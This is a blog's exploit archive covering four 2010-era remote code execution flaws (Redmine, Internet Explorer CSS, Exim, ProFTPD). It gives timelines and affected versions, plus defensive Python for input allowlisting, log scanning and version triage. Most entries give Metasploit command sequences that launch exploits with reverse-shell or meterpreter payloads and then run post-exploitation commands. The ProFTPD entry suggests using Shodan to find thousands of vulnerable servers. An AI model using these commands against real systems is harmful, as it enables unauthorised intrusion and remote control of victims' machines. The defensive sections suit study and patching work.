Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

OSVDB-70090 : Remote Code Execution for Redmine

Timeline :

Vulnerability submitted by joernchen to Redmine on 2010-12-18
Vulnerability advisory and new package provided by Redmine on 2010-12-23
Metasploit exploit released on 2010-12-24

    PoC provided by :

joernchen

    Reference(s) :

OSVDB-70090

    Affected version(s) :

All Redmine versions prior to 1.0.5, including the 0.9.x branch
redmine_1.0.4-1_all.deb on Debian Squeeze / Sid
redmine_1.0.4-1_all.deb on Ubuntu Lucid

    Tested on Ubuntu Lucid 10.04.1 LTS with :

    CVS as SCM

    Description :

joernchen has reported a vulnerability, which could be classified as highly critical, in the project management web application Redmine, which could allow an attacker to compromise a vulnerable system.

The values submitted through the “rev” parameter of the “repository/annotate” script of a Redmine project are not sanitized before being used. This error could be used to execute arbitrary code remotely on the vulnerable server.

The vulnerability mainly affects the bazaar, cvs, darcs and mercurial SCM adapters. The code is executed with the privileges of the user running the Redmine project management web application (for example www-data).

The vulnerability has been confirmed for all versions prior to 1.0.5. The vendor provides an update that corrects this vulnerability.
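To make the vulnerability class concrete from the defender's side, here is an added example (not Redmine's code, not joernchen's PoC, and not the upstream patch) contrasting the unsafe pattern described above, an unvalidated “rev” value interpolated into an SCM command line, with a hardened version, plus a scan over constructed access-log lines that flags annotate requests whose rev value fails the allowlist. The command-line shape, the `SAFE_REV` alphabet and the sample log lines are assumptions made for the illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption (not Redmine's actual rule): a revision identifier is limited to
# this alphabet. Real adapters accept different shapes (CVS tags, Mercurial
# hashes, Bazaar revnos), so the pattern is tuned per adapter; the principle is
# an allowlist checked before the value reaches any command line.
SAFE_REV = re.compile(r"\A[A-Za-z0-9][A-Za-z0-9._-]{0,63}\Z")


def annotate_cmd_unsafe(path, rev):
    """Vulnerable pattern (illustration only, never executed here): the
    untrusted 'rev' value is interpolated into a command line destined for
    /bin/sh, so any shell metacharacters in it become part of the command."""
    return "cvs annotate -r %s %s" % (rev, path)


def annotate_argv_safe(path, rev):
    """Hardened pattern: reject anything outside the allowlist and build an
    argv list, so no shell is involved and 'rev' is a single argument."""
    if not SAFE_REV.match(rev):
        raise ValueError("rejected revision identifier: %r" % rev)
    return ["cvs", "annotate", "-r", rev, "--", path]


REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_annotate_requests(log_lines):
    """Scan access-log lines for hits on a repository/annotate URL whose
    'rev' query parameter fails the allowlist. Returns (line_no, rev) pairs;
    the query string is percent-decoded before the check."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if "/repository/annotate" not in url.path:
            continue
        for rev in parse_qs(url.query).get("rev", []):
            if not SAFE_REV.match(rev):
                hits.append((number, rev))
    return hits


# Constructed sample log lines (not captured from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Dec/2010:10:00:01 +0100] "GET /redmine/projects/project2/repository/annotate/README?rev=1.4 HTTP/1.1" 200 1234',
    '10.0.0.9 - - [24/Dec/2010:10:00:07 +0100] "GET /redmine/projects/project2/repository/annotate/README?rev=1.4%3Btrue HTTP/1.1" 500 512',
    '10.0.0.5 - - [24/Dec/2010:10:00:09 +0100] "GET /redmine/projects/project2/issues HTTP/1.1" 200 8000',
]

if __name__ == "__main__":
    print(annotate_argv_safe("README", "1.4"))
    print(flag_annotate_requests(SAMPLE_LOG))
```

The detection side only reads URLs, so it can be run against archived access logs to look for exploitation attempts from before the 1.0.5 upgrade; the allowlist is deliberately strict, and a legitimate revision format an adapter needs must be added to it rather than the check being loosened to a metacharacter blocklist.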

    Commands :

use exploit/unix/webapp/redmine_scm_exec
set RHOST 192.168.178.21
set URI /redmine/projects/project2/
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.178.21
exploit

id
uname -a
/sbin/ifconfig

MS11-003 : Microsoft IE CSS Use After Free – When A DoS Isn’t A DoS

Timeline :

Vulnerability discovered on 2010-11-29 by WooYun
Vulnerability disclosed on 2010-12-08 by WooYun
Vulnerability confirmed on 2010-12-09 by VUPEN Security
Vulnerability explained on 2010-12-16 by Nephi Johnson
Exploit released on 2010-12-20 by jduck

    PoC provided by :

WooYun
d0c_s4vage
Nephi Johnson
jduck

    Reference(s) :

OSVDB-69796
SA42510
SA2488013
CVE-2010-3971
EDB-ID-15708
EDB-ID-15746
MS11-003

    Affected version(s) :

Internet Explorer 8

  • Windows XP SP3, Windows XP Professional x64 SP2, Windows Server 2003 SP2, Windows Server 2003 x64 SP2, Windows Vista SP1 and Windows Vista SP2, Windows Vista x64 SP1 and Windows Vista x64 SP2, Windows Server 2008 32 and Windows Server 2008 32 SP2, Windows Server 2008 x64 and Windows Server 2008 x64 SP2, Windows 7 32, Windows 7 x64, Windows Server 2008 R2 x64

Internet Explorer 7

  • Windows XP SP3, Windows XP Professional x64 SP2, Windows Server 2003 SP2, Windows Server 2003 x64 SP2, Windows Vista SP1 and Windows Vista SP2, Windows Vista x64 SP1 and Windows Vista x64 SP2, Windows Server 2008 32 and Windows Server 2008 32 SP2, Windows Server 2008 x64 and Windows Server 2008 x64 SP2

Internet Explorer 6

  • Windows XP SP3, Windows XP Professional x64 SP2, Windows Server 2003 SP2, Windows Server 2003 x64 SP2

    Tested on Windows XP SP3 with :

    Internet Explorer 8 (mshtml.dll 8.0.6001.18999)

    Description :

Continuing the series of Internet Explorer 0days that are disclosed and not directly acknowledged, here is “Microsoft IE CSS Use After Free”, a new vulnerability that allows complete control of a vulnerable computer to be gained.

This vulnerability was discovered on 29 November and publicly disclosed on 10 December by WooYun, a Chinese company. At that time, the vulnerability was perceived as a basic remote denial of service (DoS). On 11 December, VUPEN Security confirmed the vulnerability but with a different analysis of its impact: the vulnerability was no longer just a DoS, but could permit remote code execution and give control of vulnerable computers. Unfortunately, Microsoft did not directly respond to the WooYun disclosure or to the VUPEN analysis.

On 16 December, Nephi Johnson, a security researcher at BreakingPoint, confirmed VUPEN's impact analysis by providing a detailed analysis of the vulnerability and a PoC. We encourage you to read Nephi Johnson's article “When A DoS Isn’t A DoS”.

Enough vulnerability details were provided to allow the Metasploit team to create a PoC that evades ASLR (Address Space Layout Randomization) and bypasses DEP (Data Execution Prevention).

On 23 December, Microsoft finally acknowledged the vulnerability (SA2488013) and, as a mitigation, recommended installing and using EMET (Enhanced Mitigation Experience Toolkit).

    Commands :

use exploit/windows/browser/ms11_003_ie_css_import
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
ipconfig

exim 4.69 remote code execution

Timeline :

Vulnerability discovered on 2010-12-07 by Sergey Kononenko
Vulnerability confirmed on 2010-12-10 by David Woodhouse
Exploit released on 2010-12-10 by hdm & jduck
Vulnerability corrected on 2008-12-02, but not identified as a vulnerability for 2 years! So the fix was not ported into most OS distributions.

    PoC provided by :

Sergey Kononenko
David Woodhouse
jduck
hdm

    Reference(s) :

CVE-2010-4345
CVE-2010-4344
OSVDB-69685

    Affected version(s) :

Versions up to and including 4.69, depending on the distribution's versioning

    Tested on Debian Lenny 5.0 with :

    exim4-base_4.69-9_i386.deb
    exim4-config_4.69-9_all.deb
    exim4-daemon-light_4.69-9_i386.deb
    exim4_4.69-9_all.deb

    dpkg -l | grep exim4

    Description :

Two vulnerabilities, exploited for the past two years, have been discovered in the Exim MTA. Sergey Kononenko, an employee of a Ukrainian company, unwittingly discovered a vulnerability in the Exim4 mail server while investigating a compromise of its IT infrastructure; the vulnerability had been exploitable for two years!
This vulnerability was reported to the Exim maintainers on December 7, and the rumor spread quickly. It took no more than three days for Rapid7 researchers, authors of the Metasploit pen-testing framework, to develop a valid PoC affecting most Exim installations on all platforms (Debian, Ubuntu, Red Hat, CentOS, etc.).
At the same time, not one but two vulnerabilities were discovered. The first, CVE-2010-4344, permits remote arbitrary code execution with the privileges of the user running the Exim mail software. The second, CVE-2010-4345, allows escalation of privileges from the user running the Exim mail software to the root superuser.
It is interesting to see that the first vulnerability was corrected on December 2, 2008, but that correction was not marked as a security fix. This lack of communication meant that the distributions (Debian, Ubuntu, Red Hat, CentOS, etc.) shipping Exim were not warned of the vulnerability, and so the hidden vulnerability was never patched until now.
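The “depending on the distribution's versioning” remark above is the practical difficulty when checking a fleet: `dpkg -l | grep exim4` shows a Debian version string whose upstream part stays at 4.69 even after a distribution backports a fix. As an added example (not from the original post and not Exim's or Debian's tooling), the following parser splits Debian version strings into epoch, upstream and revision, reads `dpkg -l` style output, and lists the installed exim4 packages whose upstream version is at or below the 4.69 bound stated above. The sample listing is constructed; the result is a review list to compare against the distribution's advisory, not a verdict.

```python
import re

# Constructed sample of `dpkg -l | grep exim4` output (not from a real host);
# the last line stands in for a removed package with a newer upstream.
SAMPLE_DPKG = """\
ii  exim4                 4.69-9   metapackage to ease Exim MTA (v4) installation
ii  exim4-base            4.69-9   support files for all Exim MTA (v4) packages
ii  exim4-config          4.69-9   configuration for the Exim MTA (v4)
ii  exim4-daemon-light    4.69-9   lightweight Exim MTA (v4) daemon
rc  exim4-daemon-heavy    4.72-1   Exim MTA (v4) daemon with extended features
"""

# Upper bound from the advisory: upstream versions up to and including 4.69.
LAST_AFFECTED_UPSTREAM = "4.69"


def split_debian_version(version):
    """Split a Debian version string into (epoch, upstream, revision).
    The epoch precedes the first ':', the Debian revision follows the last '-'."""
    epoch = 0
    if ":" in version:
        epoch_str, version = version.split(":", 1)
        epoch = int(epoch_str)
    upstream, _, revision = version.rpartition("-")
    if not upstream:          # no '-' at all: native package, no revision
        upstream, revision = revision, ""
    return epoch, upstream, revision


def upstream_key(upstream):
    """Comparison key for an upstream version: the sequence of numeric
    fields, so 4.69 < 4.69.1 < 4.72."""
    return tuple(int(n) for n in re.findall(r"\d+", upstream))


def parse_dpkg_l(text):
    """Return (status, package, version) triples for exim4 rows of
    `dpkg -l` style output."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 3 and fields[1].startswith("exim4"):
            rows.append((fields[0], fields[1], fields[2]))
    return rows


def exim_candidates(text):
    """Return the installed exim4 packages whose upstream version is at or
    below the last affected upstream, as (package, version) pairs.
    A match is a candidate for review, not proof of exposure: distributions
    backport fixes while keeping the upstream number and only bumping the
    Debian revision, so the result must be checked against the
    distribution's own advisory."""
    limit = upstream_key(LAST_AFFECTED_UPSTREAM)
    candidates = []
    for status, package, version in parse_dpkg_l(text):
        if status != "ii":        # only packages actually installed
            continue
        _, upstream, _ = split_debian_version(version)
        if upstream_key(upstream) <= limit:
            candidates.append((package, version))
    return candidates


if __name__ == "__main__":
    for package, version in exim_candidates(SAMPLE_DPKG):
        print("review:", package, version)
```

Feeding real output is a matter of `exim_candidates(open("dpkg-l.txt").read())`; keeping the revision in the returned pair is what lets the reviewer match it against the fixed revision named in the advisory.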

    Commands :

dpkg -l | grep exim4
tail -f /var/log/exim4/mainlog

use exploit/unix/smtp/exim4_string_format
set RHOST 192.168.178.52
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit
id

CVE-2010-3867 : You wanna play with ProFTPD ?

ZDI discovered, on 2010-09-24, a vulnerability in ProFTPD versions between 1.3.2rc3 and 1.3.3b. This vulnerability, in Telnet IAC handling, allows a remote attacker to execute arbitrary code on vulnerable ProFTPD installations without authentication.

On 2010-11-02, the ZDI and ProFTPD teams released coordinated advisories (ZDI-10-229) and version 1.3.3c, fixing the Telnet IAC remote exploit.

As always, security researchers jumped on the advisories to create valid public PoCs or exploits.

The Rapid7 team, through jduck, integrated a valid exploit into Metasploit on 2010-11-04, targeting :

On 2010-11-07, Kingcope released on Exploit-DB (EDB-ID-15449) a valid exploit for :

  • ProFTPD 1.3.3a on FreeBSD 8.1 i386
  • ProFTPD 1.3.2a/e/c on FreeBSD 8.0/7.3/7.2 i386
  • ProFTPD 1.3.2e (Plesk binary) on Debian GNU/Linux 5.0
  • ProFTPD 1.3.3 (Plesk binary) on Debian GNU/Linux 5.0
  • ProFTPD 1.3.2e (Plesk binary) on Debian GNU/Linux 4.0
  • ProFTPD 1.3.3a (distro binary) on Debian Linux Squeeze/sid
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux 9.3
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux 10.0/10.3
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux 10.2
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux 11.0
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux 11.1
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux SLES 10
  • ProFTPD 1.3.2e (Plesk binary) on CentOS 5

What is interesting in the Kingcope exploit is seeing all the “Plesk binaries” impacted by the vulnerability. At least all Plesk versions from 9.5 to 10.0 inclusive are vulnerable. Just play with Shodan and you will get a list of thousands of vulnerable servers.
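The version range given above, 1.3.2rc3 through 1.3.3b, is awkward to check mechanically because ProFTPD mixes release candidates (rc3) and lettered maintenance releases (1.3.2e, 1.3.3a) with the plain number, and a naive string comparison gets the order wrong. As an added example (not from the original post, not ZDI's or ProFTPD's code), the following block implements that ordering, reads the version out of the FTP greeting and triages a constructed set of banners from an inventory into inside, outside or unknown. The banner shape is assumed; sites can alter or hide it, and, as the Plesk list above shows, a vendor build may carry the fix under an upstream number that still falls inside the range, so a hit is a candidate to confirm, not a conclusion.

```python
import re

# Bounds from the advisory: 1.3.2rc3 up to and including 1.3.3b are affected,
# 1.3.3c carries the fix.
FIRST_AFFECTED = "1.3.2rc3"
LAST_AFFECTED = "1.3.3b"

VERSION_RE = re.compile(r"\A(\d+)\.(\d+)\.(\d+)(?:rc(\d+)|([a-z]))?\Z")
# ProFTPD greets with a line such as "220 ProFTPD 1.3.3a Server (Debian) [...]";
# the banner shape is assumed here, and a site can change or hide it.
BANNER_RE = re.compile(r"ProFTPD (\d[\w.]*)")


def version_key(version):
    """Sortable key honouring ProFTPD's scheme: release candidates sort before
    the final release, and lettered maintenance releases after it:
    1.3.2rc3 < 1.3.2 < 1.3.2a < 1.3.2e < 1.3.3 < 1.3.3b < 1.3.3c."""
    m = VERSION_RE.match(version)
    if not m:
        raise ValueError("unrecognised ProFTPD version: %r" % version)
    major, minor, patch, rc, letter = m.groups()
    if rc is not None:
        stage = (0, int(rc))
    elif letter is not None:
        stage = (2, ord(letter) - ord("a") + 1)
    else:
        stage = (1, 0)
    return (int(major), int(minor), int(patch)) + stage


def in_affected_range(version):
    """True when version lies within [FIRST_AFFECTED, LAST_AFFECTED]."""
    return version_key(FIRST_AFFECTED) <= version_key(version) <= version_key(LAST_AFFECTED)


def classify_banner(banner):
    """Map an FTP greeting to True/False for the affected range, or None when
    no ProFTPD version can be read from it."""
    m = BANNER_RE.search(banner)
    if not m:
        return None
    try:
        return in_affected_range(m.group(1))
    except ValueError:
        return None


def triage_banners(banners):
    """Group (host, banner) pairs by classification."""
    result = {"affected_range": [], "outside_range": [], "unknown": []}
    for host, banner in banners:
        verdict = classify_banner(banner)
        if verdict is None:
            result["unknown"].append(host)
        elif verdict:
            result["affected_range"].append(host)
        else:
            result["outside_range"].append(host)
    return result


# Constructed sample greetings (not gathered from real hosts).
SAMPLE_BANNERS = [
    ("10.0.0.11", "220 ProFTPD 1.3.3a Server (Debian) [::ffff:10.0.0.11]"),
    ("10.0.0.12", "220 ProFTPD 1.3.2e Server (ProFTPD) [10.0.0.12]"),
    ("10.0.0.13", "220 ProFTPD 1.3.3c Server (Debian) [::ffff:10.0.0.13]"),
    ("10.0.0.14", "220 ProFTPD 1.3.2rc2 Server (ProFTPD) [10.0.0.14]"),
    ("10.0.0.15", "220 FTP server ready."),
]

if __name__ == "__main__":
    for bucket, hosts in triage_banners(SAMPLE_BANNERS).items():
        print(bucket, hosts)
```

The “unknown” bucket is the one to keep an eye on in practice: a host that hides its banner still needs a package-level check, and lumping it with “outside range” would silently drop it from the patch list.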

Below is a demonstration video of both exploits.